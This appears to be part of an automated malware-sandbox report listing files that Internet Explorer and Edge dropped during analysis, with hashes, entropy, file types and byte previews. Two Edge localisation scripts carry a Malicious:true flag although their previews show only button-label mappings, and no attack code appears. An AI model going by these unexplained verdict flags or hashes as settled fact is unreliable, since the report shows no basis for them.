              Entropy (8bit):5.110869777509434
              Encrypted:false
              SSDEEP:
              MD5:E35BD83086408007CE36E2C50EB61333
              SHA1:3A7A58AEE7C554C694978F6FEAC6A49BB51074E4
              SHA-256:D438F99884A8F4EE433FA07189687CB651C41C7667BE023F033F9FDFFF2D2387
              SHA-512:FE95D3B1EC4B13403215A9BED554D411E3818D20F8DB7E04C32D79B1CFF9D96A38A0C299DB02CFFA502046011663FF014FC548990DFC03087A0E2E6B413D60E7
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x298eb58d,0x01da6afe</date><accdate>0x298eb58d,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
              Category:dropped
              Size (bytes):354
              Entropy (8bit):5.125531792294978
              Encrypted:false
              SSDEEP:
              MD5:ACEF31B0040296571AA59A3844B7A3AE
              SHA1:03A98C138F5D9677F62F621603525A814D70B324
              SHA-256:8EA5E353A5A3146DB973B48200981377739FEA868D1F7BB7CFE7F70B45367623
              SHA-512:C69E0ABED912FDD4925A7CAD08B77776A6421DFF9D5A5B07D793F3B9EF6C90C09F8CF4AA3D2A19A4B74958315AF2738FBD45C3129296DBF54C636618F030BC10
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x29912645,0x01da6afe</date><accdate>0x29912645,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):2278
              Entropy (8bit):3.849743394749817
              Encrypted:false
              SSDEEP:
              MD5:99725575267A09619CAD63556FBC9391
              SHA1:5C019562447A30E2B2B42C2E27F74B2C38916F5E
              SHA-256:7DE16DE3D11BD6188F2450B3E06501AAD1E7FECD286A9D5C179BE2F621B2C2FD
              SHA-512:E721ADBD12CA6E572E429348B97A2712B6FEE9D4D660B20B14C508EDD116448A5A2D3EB332ED0B527D28213F160F5F4E5E4E16DA41C51FB6AE6782D2B0EA8099
              Malicious:false
              Reputation:unknown
              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L.G.1.e.A.Z.r.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.g.M.5.S.u.r.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):4622
              Entropy (8bit):3.994347962268964
              Encrypted:false
              SSDEEP:
              MD5:B8E7DCAB688AD7716766DD49021DD188
              SHA1:1D80C07E89E79F1A1E81E769784167852AE7A591
              SHA-256:D66D035667ACD0AC09830E157EFE7A08797C6BB5C667A316BCE644586171F601
              SHA-512:153A3BF3D96D8541EF292A632633D31C800C102DE24C6564AE315D19F61DACEA8E86A1A569FD933D874D22CD30E080545A4EA2D948F8964C061434B2745A2050
              Malicious:false
              Reputation:unknown
              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".K.G.e.f.X.v.5.q.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.g.M.5.S.u.r.
              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):17524
              Entropy (8bit):4.340063035506032
              Encrypted:false
              SSDEEP:
              MD5:03710426AB25AD1280E197F61249F9DE
              SHA1:F5E7A6FD42503AE4758BC36C8DD78D98EFB35047
              SHA-256:21E63F7C77896ED2B5F115957F2448E0A9E2DD738D7D487E471217421F6A93E1
              SHA-512:213CB55B8573335D1384AE704FF4267F224376056F71548660F9B2FDAA1203D8ABDDB787900AAF5D1E0AC6E5BE261F713BDBEFB67643D08E8D3672512A1AF588
              Malicious:false
              Reputation:unknown
              Preview:(function()..{.. var XHTML = "http://www.w3.org/1999/xhtml";.. .. // Time slicing constants.. var LIMIT = 10; // Maximum number of nodes to process before checking time.. var DURATION = 200; // Maximum amount of time (ms) to process before unblocking UI.. var DELAY = 15; // Amount of time (ms) to unblock UI.... // Tree building state.. var iterator;.. var nextNode;.. var root;.. var rootFirstChild;.. var time;.. .. // Template References.. var attrTemplate, attrName, attrValue;.. var elmStartTemplate, elmStartName;.. var elmEndTemplate, elmEndName;.. var cdataTemplate, cdataValue;.. var commentTemplate, commentValue;.. var style; .. .. // Only invoke this script if it was injected by our parser. Test for a condition that is.. // impossible for a markup to create - two direct children of the document... var secondRootElement = document.documentElement.nextElementSibling;.. if (secondRootElement == null
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
              Category:dropped
              Size (bytes):76322
              Entropy (8bit):7.996120636467823
              Encrypted:true
              SSDEEP:
              MD5:D46360B63F45589A58D746998F0E6BA8
              SHA1:8431B33363F5B069AFA65A911806771DC4D8C190
              SHA-256:E6622EE2B54C51C686F615366E687E5CE18195B6A6416984F39C02030EE11604
              SHA-512:AAC135A490606B1A6213A75AD7EFAB1640E4B6D1DBD6ADA6A57539326103A3D02ED39A67C25CF72D2B316A52794E137962DF217CE28329DD06F35ED33F815B1C
              Malicious:false
              Reputation:unknown
              Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:PNG image data, 264 x 120, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):264439
              Entropy (8bit):7.9986005875272115
              Encrypted:true
              SSDEEP:
              MD5:FC8CC518539D5277D28EAC5F17B4B3EC
              SHA1:D2280728953AA6B51ECF92FAE6205646D94AB837
              SHA-256:CE2C605265CA06828C1EB38D2FD268B1D2BAADDDBC6D1D92803E07BED52B6645
              SHA-512:FF1BDBFA502D2706F15A93256FD2F18672787A03D4B3C2AA6B6747936B89BDC363306FCEA44AF9C836AEFD01831887C1E58C16EF681C7E3BD5F313BDAC34BDC9
              Malicious:false
              Reputation:unknown
              Preview:.PNG........IHDR.......x.......l....IDATx...g.d.u....>.r.4.=9...A$H. .&..IIT.L....+...h.%9+\[..dY.H..(J....H.....s...N...p...gz..$.._...N.:a..z..%h=.l........q/....y.@.y}.C..F.5ol...e.zm.Fv!^.z#G$..+...7.m.5..1....!^.]..1n........(.E!. .Og...u.o.g.B}....f.7..\>.7z.@_6262....[m.n........q..F.!...W.BiPk.K_../.O.&.0...@+Dk<i..Q.].t.Rb ....`...(..q..B.kn.-9nc.q.F...._../...|..fX.....k...3.\.=H.0....Dk..F.A\..^;W,...4.Zk....J+........e.G......h..5.....2..{..z..5........f....O..O....&..q.N................F.9....!%Z....Hk.iJ.7.... ....l.m0..Vm..p...;.ox..vn..Q...B..ao.k...h.q.~.$..$.....J.K...h..B....:{..u...<.....;.l......V..==.4.M....4[..k..7.(...wC....kz.b..Ah....J!.3.^?.....U....aa[..X...#-.]....[7K6ri....e..7l............\.f..:..`x......q...!...,.f....G......q.x.k...zn....7k...|o..i?@GI>..{....b .i.....{.W.0..-..x]...#.\2.*..80.................J#..-.Np.# l...z]6C_...W...... ..a.b........}5.h.....Gxc.E.5....T:}....0......X......du.Xa....
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 52717
              Category:dropped
              Size (bytes):513595
              Entropy (8bit):7.9879074147565365
              Encrypted:false
              SSDEEP:
              MD5:496533EDE11BAB9CCB4A7E8F51321F9F
              SHA1:48F896410D19B998CF8610E883D86012007F830F
              SHA-256:70FA2D563EB024014BAC237AA067A519D25C02F1B44EFD6BF346F58B899B9CC0
              SHA-512:44165CF8A27E7C1B999AF6A8EEBCDFEBA981F04CE3C3FB108FCE53DE0B16468DE36C88B39DFEB3BE2913045C31AACFF46A965A8D85DA7735DF043CE702663205
              Malicious:false
              Reputation:unknown
              Preview:...........\.v.8.~...7-...Q......lf&?;Nfw...."!.1EhHP.b...E..d....\8.W@..P.>....8.......7..E..>..._]..........`..4..H..K=..9E.....P:.....tF.'J.Y3u.B0v=...o..v..o.=..!.......=...M..:...z...>|OT.!|.`..@)......vT....(<...{..m..\....S.H#>.S.9gS.[s1o\.V3.<{...K.1)...{~.......y<o.....,c;?...M...7..!U...E.bM.c....nY..KU.l.0..C.3!.....T...%.4..I....k..C.A.T..~(Rh....g.....l.]e.;.Vu..KN.5..<..:*.*[.+......./'....n*...>..w;.||...G.K....lJ.....C.R0..3'-V3.U..'<].{..59..".O..!v......./.T$ec.S...]$R>9k.'......~.....~..J.C..Ll.|..'b..o).6>...Y&...6..q.`R..Z6.hP..F*..<Kx#...4....o..".a..o."...0d...3o..\6.l...q..M...r)".q......Y.F.Y`.R...J.>.z..6..O..l.e.F...8y.00...MUd..d.....H..H.....OMw......\.h...f.Rn.5I.TN.4..........9!../4.a../`....+...)t.vI.@...).M.......k..>.h..8.].;....].U...Y...Ya.:....O....?..x.-x...|....u..8.C....{.|........^.(.+.,.y..-R....6.K.m.{Z...&..V.L..v'.ky.[#T3..0.....{..3....ob.;n....W..j{"E..|>.Clmg5.....k..f..<8Q.;vC]
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 122014
              Category:dropped
              Size (bytes):513595
              Entropy (8bit):7.9879074147565365
              Encrypted:false
              SSDEEP:
              MD5:D15837E6B4E2D914C14764F9672C39ED
              SHA1:5CA24E4B960ADC961541E8D657010A1E6852C20C
              SHA-256:CC5A905B8C3F9E8DC0459669F8FC7CDC46845BE92401F6E7C43DE71F4BDB8760
              SHA-512:883B6235C55FD80F56259A8A0A485497168DD76B6A3FE10B55DFF747D98D969982A5A2EBF63DB5790502F6DA60564D08B98EF7082064252021CFD3B552941788
              Malicious:false
              Reputation:unknown
              Preview:...........\.v.8.~...7-...Q......lf&?;Nfw...."!.1EhHP.b...E..d....\8.W@..P.>....8.......7..E..>..._]..........`..4..H..K=..9E.....P:.....tF.'J.Y3u.B0v=...o..v..o.=..!.......=...M..:...z...>|OT.!|.`..@)......vT....(<...{..m..\....S.H#>.S.9gS.[s1o\.V3.<{...K.1)...{~.......y<o.....,c;?...M...7..!U...E.bM.c....nY..KU.l.0..C.3!.....T...%.4..I....k..C.A.T..~(Rh....g.....l.]e.;.Vu..KN.5..<..:*.*[.+......./'....n*...>..w;.||...G.K....lJ.....C.R0..3'-V3.U..'<].{..59..".O..!v......./.T$ec.S...]$R>9k.'......~.....~..J.C..Ll.|..'b..o).6>...Y&...6..q.`R..Z6.hP..F*..<Kx#...4....o..".a..o."...0d...3o..\6.l...q..M...r)".q......Y.F.Y`.R...J.>.z..6..O..l.e.F...8y.00...MUd..d.....H..H.....OMw......\.h...f.Rn.5I.TN.4..........9!../4.a../`....+...)t.vI.@...).M.......k..>.h..8.].;....].U...Y...Ya.:....O....?..x.-x...|....u..8.C....{.|........^.(.+.,.y..-R....6.K.m.{Z...&..V.L..v'.ky.[#T3..0.....{..3....ob.;n....W..j{"E..|>.Clmg5.....k..f..<8Q.;vC]
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
              Category:dropped
              Size (bytes):121127
              Entropy (8bit):7.997548984235841
              Encrypted:true
              SSDEEP:
              MD5:1239E5B1E1E74F67DB91B16C6E9AA582
              SHA1:4799DAE4A919DA6E6337214AA6F183EBB9FEA27B
              SHA-256:17AF496E6398A3A678CA6EB767255661629FF79E9148C8E0C637C2F72AA4EBFC
              SHA-512:83D30364DA9A5A20CE6C0500CD7B4B86EB3A2AE95E97D265492E45ADBBD54A621087E55D4C28AFE9F7127CFF514B112A916A46D81E0C0CAC8C004E498E29B95B
              Malicious:false
              Reputation:unknown
              Preview:............ko..q?....Am..0.<.M...e.B,[......|J..............x..8. .w73;;;;....L.....La.k&.k..........~...#..........%.Y.>}.j~.O.r..L....R.`..w......ta.'.....~:.9.'C...|..Gt...'..y..?...}..........,....1?..)QX....tgpgN.`..~...'.h.3^.s..UT...~o..R.].4^..V8"JwfnH...%..........i.qmG4.1@....a....\.i.C..Rq9.h....\..j...u..O..O.5!.}x....%j..}CW+.*..jaA.......-...*....P?..vA3+iU...N...%...x.E.8.Z..2HQw._.H8........+Lw].wL..........tc..l.+p..7..<).......Z.!..!i......?./.P9.y..;....,..C.K.....~.0........E...n..(..&.X...na-c.6.....Q.[.p.IO....[...W$....l7J.,..=EK.3Y...R...|..z_i.q......./.......[..5..qE.....FM+..VRB...r9!{3.....!...;.,{..}.sP..m..f.....~..2J..4.+..i6M...EW..ON..N.........4...T...j...1:..E=..<....Y..w.MV.....w.q.{...Y.....J...@.W..i.Sm;..0.1......./.4..b.wPbK.yeZ@.I...0.C.TZ$...-.+.[*......w.qG..}B^........n....#.........Y4.g4.....(.K..e..q7[.{..W....,%...z.^N...[/?......).9/?...r].oM2.'G.gu..Q|..._+......1^...9......-.j2lae..+!3
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
              Category:dropped
              Size (bytes):103469
              Entropy (8bit):7.5851113512003785
              Encrypted:false
              SSDEEP:
              MD5:37CF67E6E5D3AE47CF40406A1E8BE94F
              SHA1:2A6F868ADC761DB9C03869E238BEA0D67D1FE6CE
              SHA-256:B4B4DBE335296D0CCF9C659D671A54C2FA06F8B4E41228CF03E1D21F7C8F9D03
              SHA-512:51F2C8B56592237378BE92C3EFCD814FC3E144120D109B15A7341AB03F9674251EE8B21BB172E6E021100F4EF792A5114D5B94F86EE0B157FD3386975BEC94CD
              Malicious:false
              Reputation:unknown
              Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:Google Chrome extension, version 3
              Category:dropped
              Size (bytes):98996
              Entropy (8bit):7.702003651641397
              Encrypted:false
              SSDEEP:
              MD5:34F93FE5B54D7C652360BA28D94F8E66
              SHA1:31901469EADAD58B8BF99BBD9698E60ACDD7ABED
              SHA-256:10DC1ED2D8D9D4DB369DDF7FD6F53EFFC9BFD87F46AFDFC6C86CB637D2067A38
              SHA-512:9B86ACC2F5B92A75BD3028352F03DA10C6424C3514A3372A32EA8F60E79770D8B5AC5DBE0B45DD54B804C6EC79E1A1DBD887D0DF333DD253238DC30E6C5A1000
              Malicious:false
              Reputation:unknown
              Preview:Cr24....f"........0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........;:[........o$..#Cb.G+.T.hI.9...M.J..u.:....13S..*...%...)Rd.rROmI#z_..sO6@...'/'..... \....5}k..R..2..22..?E.......r;E..Z...C.^.J...=.E.m..hb%{DiYnrD....T.....B.`Z..OCQf...."..P..7.W...D....}.E7P...uf........A.....s.L.!.......!.9..J..c\Ac\5.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. Z.......o...$k.Sz.i...9D..K.$.. -=C.}.b...P....;.._"...u..s2#..c".>...........|[..:.._...9...O2o.A`.D......D....4..t...euGOL..~...:.:....^...?..C6...8.....?~..M............?..c#.R.........SyU.R..7..L...6r.mk.U.u....X..Wa.o...".o..l...(.5.....t..o......Y..1Q...me....K.....{.~N=8_.:."G.....qq5...^.~....s'.4...re.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1658
              Entropy (8bit):5.385705870160237
              Encrypted:false
              SSDEEP:
              MD5:0B1553B3685E462A6154C1E5D4F3D71A
              SHA1:0B40869133CBC21FE3D5A88DC53E14DF99AD7A9E
              SHA-256:551D3B2187AD26F2AF9D7603D4B4DEE7FBE4C58F51A9D55B6C07EA2019B2AB90
              SHA-512:9B9A4F113DDE22EBA778E8E68FE707D9D4D0F4B71ADAF78FB69B097CCCE19F58994AF425175D66A5E736F1FCD1B88F58A5165D88659DE8796383F479F246EA08
              Malicious:false
              Reputation:unknown
              Preview:{"logTime": "1006/094402", "correlationVector":"8WI8p7zmTYZPBE2VuaIHdV","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/094402", "correlationVector":"BE656E2071D443B2A044B6460819F865","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/094402", "correlationVector":"ofm+cIrSMXiKDSEfAz53+L","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/100217", "correlationVector":"BAAKQ8ziDwmR+5pa4ka4fJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/100217", "correlationVector":"26B927C0336B4CA88B073123F1EBD565","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/100344", "correlationVector":"0X4rigFMuRDtJh2eBJUoom","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/100344", "correlationVector":"7D72384D1A7E431FAD88F4EA6E3461C6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/100656", "correlationVector":"lbOwU396NAlX9/dcZ65n2d","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/100657", "correlationVector":"D051616C
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:Google Chrome extension, version 3
              Category:dropped
              Size (bytes):11185
              Entropy (8bit):7.951995436832936
              Encrypted:false
              SSDEEP:
              MD5:78E47DDA17341BED7BE45DCCFD89AC87
              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
              Malicious:false
              Reputation:unknown
              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1753
              Entropy (8bit):5.8889033066924155
              Encrypted:false
              SSDEEP:
              MD5:738E757B92939B24CDBBD0EFC2601315
              SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
              SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
              SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
              Malicious:false
              Reputation:unknown
              Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
              Category:dropped
              Size (bytes):9815
              Entropy (8bit):6.1716321262973315
              Encrypted:false
              SSDEEP:
              MD5:3D20584F7F6C8EAC79E17CCA4207FB79
              SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
              SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
              SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
              Malicious:true
              Reputation:unknown
              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
              Category:dropped
              Size (bytes):10388
              Entropy (8bit):6.174387413738973
              Encrypted:false
              SSDEEP:
              MD5:3DE1E7D989C232FC1B58F4E32DE15D64
              SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
              SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
              SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
              Malicious:true
              Reputation:unknown
